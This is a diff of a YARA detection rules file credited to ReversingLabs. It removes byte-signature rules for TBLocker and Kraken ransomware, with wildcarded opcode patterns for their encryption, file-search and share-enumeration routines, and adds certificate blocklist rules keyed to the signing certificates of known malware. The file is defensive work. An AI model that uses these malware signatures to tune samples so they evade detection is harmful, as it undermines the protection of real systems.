+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L12330-L12348"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "9b678e9fb1e1eda3ac8e027b5e449af446de4379fea46ef7ff820240c73795ee"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "TBLocker"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$main_ransomware_function_p1 = {
-            00 02 16 28 ?? ?? ?? ?? 00 02 17 28 ?? ?? ?? ?? 00 02 16 28 ?? ?? ?? ?? 00 02 16 28 ?? ?? ?? ?? 00 02
-            16 28 ?? ?? ?? ?? 00 02 28 ?? ?? ?? ?? 00 00 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ??
-            ?? 16 FE ?? 0A 06 2C ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 72 ?? ?? ?? ??
-            28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 18 16 15 28 ?? ?? ?? ?? 26 00 00 28 ?? ?? ?? ?? 28 ?? ??
-            ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 16 FE ?? 0B 07 39 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72
-            ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 FE ?? 0C 08 2C ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ??
-            ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ??
-            ?? ?? ?? 28 ?? ?? ?? ?? 00 00 00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 17 6F ??
-            ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 00 DE ?? 25
-            28 ?? ?? ?? ?? 0D 00 28 ?? ?? ?? ?? DE ?? 00 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 02 17 28 ?? ?? ?? ??
-            00 02 18 28 ?? ?? ?? ?? 00 02 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ??
-            6C 23 ?? ?? ?? ?? ?? ?? ?? ?? 5B 02 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 6C 23 ?? ?? ?? ?? ?? ?? ?? ?? 5B 59
-        }
-		$main_ransomware_function_p2 = {
-            28 ?? ?? ?? ?? B7 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 6C 23 ?? ?? ?? ?? ?? ?? ??
-            ?? 5B 28 ?? ?? ?? ?? B7 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 02 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ??
-            ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 6C 23 ?? ?? ?? ?? ?? ?? ?? ?? 5B 02 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 6C 23
-            ?? ?? ?? ?? ?? ?? ?? ?? 5B 59 28 ?? ?? ?? ?? B7 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ??
-            ?? 6C 23 ?? ?? ?? ?? ?? ?? ?? ?? 5B 23 ?? ?? ?? ?? ?? ?? ?? ?? 5A 28 ?? ?? ?? ?? B7 73 ?? ?? ?? ?? 6F
-            ?? ?? ?? ?? 00 02 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 6C 23 ?? ??
-            ?? ?? ?? ?? ?? ?? 5B 02 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 6C 23 ?? ?? ?? ?? ?? ?? ?? ?? 5B 59 28 ?? ?? ??
-            ?? B7 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 1F ?? DA 73 ?? ?? ?? ?? 6F ?? ?? ?? ??
-            00 02 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 6C 23 ?? ?? ?? ?? ?? ??
-            ?? ?? 5B 02 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 6C 23 ?? ?? ?? ?? ?? ?? ?? ?? 5B 59 28 ?? ?? ?? ?? B7 28 ??
-            ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 6C 23 ?? ?? ?? ?? ?? ?? ?? ?? 5B 23 ?? ?? ?? ?? ??
-            ?? ?? ?? 5A 28 ?? ?? ?? ?? B7 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 02 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F
-        }
-		$search_files = {
-            00 00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 03 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 0A 38 ?? ?? ?? ?? 06 6F ?? ?? ??
-            ?? 0B 07 07 6F ?? ?? ?? ?? 17 DA 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 16 FE
-            ?? 0C 08 2C ?? 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 FE ?? 0D 09 2C ?? 00 02 07 07 72 ??
-            ?? ?? ?? 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 07 28 ?? ?? ?? ?? 00 DE ?? 25 28 ?? ?? ??
-            ?? 13 ?? 00 11 ?? 6F ?? ?? ?? ?? 16 14 28 ?? ?? ?? ?? 26 28 ?? ?? ?? ?? DE ?? 00 00 00 00 00 00 06 6F
-            ?? ?? ?? ?? 13 ?? 11 ?? 3A ?? ?? ?? ?? DE ?? 06 2C ?? 06 6F ?? ?? ?? ?? 00 DC DE ?? 25 28 ?? ?? ?? ??
-            13 ?? 00 28 ?? ?? ?? ?? DE ?? 00 03 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 38 ?? ?? ?? ?? 11 ?? 11 ?? 9A 13 ??
-            00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ?? 11 ?? 6F ??
-            ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 17 DA 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 28 ??
-            ?? ?? ?? 16 FE ?? 13 ?? 11 ?? 2C ?? 11 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 FE ?? 13 ??
-            11 ?? 2C ?? 00 02 11 ?? 11 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 11 ??
-            28 ?? ?? ?? ?? 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 11 ?? 6F ?? ?? ?? ?? 16 14 28 ?? ?? ?? ?? 26 28 ??
-            ?? ?? ?? DE ?? 00 00 00 00 00 00 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 3A ?? ?? ?? ?? DE ?? 11 ?? 2C ?? 11
-            ?? 6F ?? ?? ?? ?? 00 DC DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 ?? ?? ?? ?? DE ?? 00 00 11 ?? 17 D6 13 ??
-            11 ?? 11 ?? 8E 69 FE ?? 13 ?? 11 ?? 3A ?? ?? ?? ?? 2A
-        }
-		$encrypt_files = {
-            00 00 03 19 17 73 ?? ?? ?? ?? 0A 04 18 18 73 ?? ?? ?? ?? 0B 73 ?? ?? ?? ?? 0C 08 28 ?? ?? ?? ?? 05 6F
-            ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 08 28 ?? ?? ?? ?? 05 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 08 6F ?? ?? ?? ??
-            0D 07 09 17 73 ?? ?? ?? ?? 13 ?? 06 6F ?? ?? ?? ?? 17 6A DA B7 17 D6 8D ?? ?? ?? ?? 13 ?? 06 11 ?? 16
-            11 ?? 8E 69 6F ?? ?? ?? ?? 26 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 00 11 ?? 6F ?? ?? ?? ?? 00 07
-            6F ?? ?? ?? ?? 00 06 6F ?? ?? ?? ?? 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 ?? ?? ?? ?? DE ?? 00 2A
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AMCERT,LLC" and ( pe.signatures [ i ] . serial == "00:bc:6a:18:12:e0:01:36:24:69:54:11:08:97:3b:bd:52" or pe.signatures [ i ] . serial == "bc:6a:18:12:e0:01:36:24:69:54:11:08:97:3b:bd:52" ) and 1623801600 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_Bde1D6Dc3622724F427A39E6A34F5124 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "6b6958c0-3b43-5c17-9354-d0e2326b97fd"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L12350-L12368"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "f1cf0b6855269a771447a0b38f4a02996b6527d7df4b143b69598ed591719ca0"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( all of ( $main_ransomware_function_p* ) ) and $search_files and $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AMCERT,LLC" and ( pe.signatures [ i ] . serial == "00:bd:e1:d6:dc:36:22:72:4f:42:7a:39:e6:a3:4f:51:24" or pe.signatures [ i ] . serial == "bd:e1:d6:dc:36:22:72:4f:42:7a:39:e6:a3:4f:51:24" ) and 1628553600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Linux_Ransomware_Kraken : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_5C9F5F96726A6E6Fc3B8Bb153Ac82Af2 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Kraken ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "7c302c2e-6ffc-5f51-90f4-c4ebd6c1c28b"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "f7619c39-33a0-5f99-b911-9d8a61a4683d"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Kraken.yara#L1-L151"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "4a3867aba4dbdce5d008331a3058f57b00db246975fc4d77b79ab49d5f0bbb15"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L12370-L12386"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "a61bcc4a90a75a429366e3f93929005b67325eccc6cad3df6b7a0c3692597828"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Kraken"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$enum_volumes = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? ?? ?? ?? ?? 04 ?? 00 A1 ?? ?? ?? ??
-            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? ?? ?? ?? ?? 50 45 4C 00 C7 45
-            FC 00 00 00 00 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ??
-            ?? ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 0F 1F 84 00 ?? ?? ?? ??
-            8A 06 84 C0 0F 84 ?? ?? ?? ?? 3C ?? 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8B D6 8B C8 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 EC ?? 8B D4
-            C7 42 ?? ?? ?? ?? ?? C7 42 ?? ?? ?? ?? ?? 83 7A ?? ?? 72 ?? 8B 02 EB ?? 8B C2 C6 00
-            ?? 80 3E ?? 75 ?? 33 C9 EB ?? 8B CE 8D 79 ?? 8A 01 41 84 C0 75 ?? 2B CF 51 56 8B CA
-            E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8B D6 8B C8 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 C6 ?? E9 ?? ?? ?? ?? BA ??
-            ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? 50 E8 ??
-            ?? ?? ?? 83 C4 ?? 83 EC ?? 8B CC C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 83 79 ??
-            ?? 72 ?? 8B 01 EB ?? 8B C1 6A ?? 68 ?? ?? ?? ?? C6 00 ?? E8 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C8 E8 ??
-            ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50
-            E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8
-            ?? ?? ?? ?? 8B E5 5D C3 BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ??
-            ?? 83 C4 ?? B8 ?? ?? ?? ?? C3
-        }
-		$enum_shares_p1 = {
-            50 56 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 32 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F
-            5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 66 0F 1F 44 00 ?? FF 75 ?? 6A ?? FF
-            15 ?? ?? ?? ?? 8B F0 8D 45 ?? 50 56 8D 45 ?? 89 75 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ??
-            85 C0 0F 85 ?? ?? ?? ?? 33 FF 0F 1F 40 ?? 3B 7D ?? 0F 83 ?? ?? ?? ?? 8B C7 C1 E0 ??
-            03 F0 F7 46 ?? ?? ?? ?? ?? 74 ?? 6A ?? E8 ?? ?? ?? ?? 0F 10 06 83 C4 ?? 8B C8 0F 11
-            00 0F 10 46 ?? 0F 11 40 ?? E8 ?? ?? ?? ?? 8B 75 ?? B3 ?? 47 EB ?? F7 46 ?? ?? ?? ??
-            ?? 0F 84 ?? ?? ?? ?? 8B 56 ?? 85 D2 0F 84 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
-            ?? ?? ?? ?? C6 45 ?? ?? 80 3A ?? 75 ?? 33 C9 EB ?? 8B CA 8D 71 ?? 8A 01 41 84 C0 75
-            ?? 2B CE 51 52 8D 4D ?? E8 ?? ?? ?? ?? 51 8D 55 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ??
-            ?? 83 C4 ?? 8B F0 BA ?? ?? ?? ?? C6 45 ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D6 8B
-            C8 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? 83 C4 ?? 8B 45 ?? 83 F8 ?? 72 ?? 8B
-        }
-		$enum_shares_p2 = {
-            4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 74 ?? E8 ?? ?? ?? ?? 8B 41 ?? 3B C1 72 ?? E8
-            ?? ?? ?? ?? 2B C8 83 F9 ?? 73 ?? E8 ?? ?? ?? ?? 83 F9 ?? 76 ?? E8 ?? ?? ?? ?? 8B C8
-            51 E8 ?? ?? ?? ?? 83 C4 ?? 83 EC ?? 8D 55 ?? 8B CC 51 E8 ?? ?? ?? ?? 83 C4 ?? E8 ??
-            ?? ?? ?? 83 C4 ?? 8D 55 ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 BA ?? ?? ?? ??
-            C6 45 ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D6 8B C8 E8 ?? ?? ?? ?? 50 E8 ?? ?? ??
-            ?? C6 45 ?? ?? 83 C4 ?? 8B 45 ?? 83 F8 ?? 72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6
-            C1 ?? 74 ?? E8 ?? ?? ?? ?? 8B 41 ?? 3B C1 72 ?? E8 ?? ?? ?? ?? 2B C8 83 F9 ?? 73 ??
-            E8 ?? ?? ?? ?? 83 F9 ?? 76 ?? E8 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? C6 45
-            ?? ?? 8B 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 83 F8 ?? 72 ??
-            8B 4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 74 ?? E8 ?? ?? ?? ?? 8B 41 ?? 3B C1 72 ??
-            E8 ?? ?? ?? ?? 2B C8 83 F9 ?? 73 ?? E8 ?? ?? ?? ?? 83 F9 ?? 76 ?? E8 ?? ?? ?? ?? 8B
-            C8 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ??
-            8B 75 ?? B3 ?? 47 E9 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? BA
-            ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8A C3 E9 ?? ??
-            ?? ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? B8 ??
-            ?? ?? ?? C3
-        }
-		$find_files = {
-              55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? ?? ?? ?? ?? A1 ?? ?? ?? ?? ?? ?? ??
-              ?? EC 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? ?? ?? ?? ?? 45 FC 00 00 00 00 8D 4D ??
-              C6 45 ?? ?? 8B 75 ?? 83 FE ?? 8B 7D ?? 8B 55 ?? 0F 43 CF 6A ?? 68 ?? ?? ?? ?? E8 ??
-              ?? ?? ?? 83 C4 ?? 8D 4D ?? 85 C0 0F 84 ?? ?? ?? ?? 83 FE ?? 6A ?? 0F 43 CF 68 ?? ??
-              ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 85 C0 0F 84 ?? ?? ?? ?? 83 FE ?? 6A ?? 0F 43
-              CF 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 85 C0 0F 84 ?? ?? ?? ?? 83 FE ??
-              6A ?? 0F 43 CF 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 0F 57
-              C0 C7 45 ?? ?? ?? ?? ?? 66 0F D6 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
-              45 ?? ?? ?? ?? ?? 83 FE ?? C6 45 ?? ?? 8D 4D ?? 0F 43 CF E8 ?? ?? ?? ?? 8B F0 89 75
-              ?? 85 F6 0F 84 ?? ?? ?? ?? 8D 45 ?? 8B D6 50 8B CE E8 ?? ?? ?? ?? 8B 5D ?? 83 C4 ??
-              85 DB 0F 84 ?? ?? ?? ?? 8D 7B ?? B9 ?? ?? ?? ?? 8B C7 66 0F 1F 44 00 ?? 8A 10 3A 11
-              75 ?? 84 D2 74 ?? 8A 50 ?? 3A 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ?? 33 F6 EB ??
-              1B F6 83 CE ?? B9 ?? ?? ?? ?? 8B C7 0F 1F 40 ?? 8A 10 3A 11 75 ?? 84 D2 74 ?? 8A 50
-              ?? 3A 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 3B F0 8B
-              75 ?? 0F 85 ?? ?? ?? ?? 8B 43 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 4D ?? 57 3D ?? ?? ?? ??
-              75 ?? E8 ?? ?? ?? ?? 50 8D 55 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 EC
-              ?? C6 45 ?? ?? 8B CC 8B D0 51 E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D
-              ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ??
-              83 EC ?? C6 45 ?? ?? 8B CC 8D 55 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ?? ?? ?? 83 C4
-              ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 75 ?? E9 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ??
-              83 EC ?? 8D 45 ?? 8B CC 50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? BA ?? ?? ??
-              ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? 8B C8 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83
-              C4 ?? B8 ?? ?? ?? ?? C3 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? E8 ?? ?? ??
-              ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD
-              E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$encrypt_files_p1 = {
-              55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? ?? ?? ?? ?? A1 ?? ?? ?? ?? ?? ?? ??
-              ?? EC 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? ?? ?? ?? ?? 45 FC 00 00 00 00 C6 45 ??
-              ?? 83 05 ?? ?? ?? ?? ?? 83 15 ?? ?? ?? ?? ?? 83 EC ?? 8B CC C7 41 ?? ?? ?? ?? ?? C7
-              41 ?? ?? ?? ?? ?? 83 79 ?? ?? 72 ?? 8B 01 EB ?? 8B C1 6A ?? C6 00 ?? 8D 45 ?? 6A ??
-              50 E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 EC ?? C6 45 ?? ?? 8B CC C7 41
-              ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 83 79 ?? ?? 72 ?? 8B 01 EB ?? 8B C1 6A ?? C6 00
-              ?? 8D 45 ?? 6A ?? 50 E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D
-              4D ?? 83 3D ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 8B 7D ?? 0F 43 05 ?? ?? ?? ?? 83 FF ?? FF
-              35 ?? ?? ?? ?? 8B 75 ?? 0F 43 CE 8B 55 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ??
-              ?? ?? ?? 83 FF ?? 8D 4D ?? 6A ?? 0F 43 CE 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85
-              C0 0F 84 ?? ?? ?? ?? 83 FF ?? 8D 4D ?? 6A ?? 0F 43 CE 68 ?? ?? ?? ?? E8 ?? ?? ?? ??
-              83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 FF ?? 8D 4D ?? 6A ?? 0F 43 CE 68 ?? ?? ?? ?? E8
-              ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8
-        }
-		$encrypt_files_p2 = {
-              84 C0 0F 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ??
-              ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 8D 45
-              ?? 6A ?? 0F 43 45 ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B
-              D8 83 FB ?? 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 99 6A ?? 8B F0 8B FA 8D 45 ?? 50 68 ??
-              ?? ?? ?? FF 35 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 99 2B C6 1B D7 01 05
-              ?? ?? ?? ?? 11 15 ?? ?? ?? ?? 83 65 ?? ?? 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 99 8B FA
-              8B F0 8B 55 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 99 2B C6 6A ?? 1B D7 01 05 ?? ?? ?? ??
-              8B 45 ?? 11 15 ?? ?? ?? ?? 01 05 ?? ?? ?? ?? 6A ?? 83 15 ?? ?? ?? ?? ?? 6A ?? 53 FF
-              15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 99 6A ?? 8B F0 8B FA 8D 45 ?? 50 FF 75 ?? FF 35 ?? ??
-              ?? ?? 53 FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 99 2B C6 53 1B D7 01 05 ?? ?? ?? ?? 11 15
-              ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 51 8D 55 ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B C8 83 C4 ?? 83
-              79 ?? ?? 72 ?? 8B 09 83 7D ?? ?? 8D 45 ?? 51 0F 43 45 ?? 50 FF 15 ?? ?? ?? ?? 8D 4D
-              ?? E8 ?? ?? ?? ?? 83 05 ?? ?? ?? ?? ?? 83 15 ?? ?? ?? ?? ?? EB ?? 53 FF 15 ?? ?? ??
-              ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ??
-              64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "1105 SOFTWARE LLC" and pe.signatures [ i ] . serial == "5c:9f:5f:96:72:6a:6e:6f:c3:b8:bb:15:3a:c8:2a:f2" and 1679061408 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_6E889Bb3B7F7194B674C6A0335A608E0 : INFO FILE
+{
+	meta:
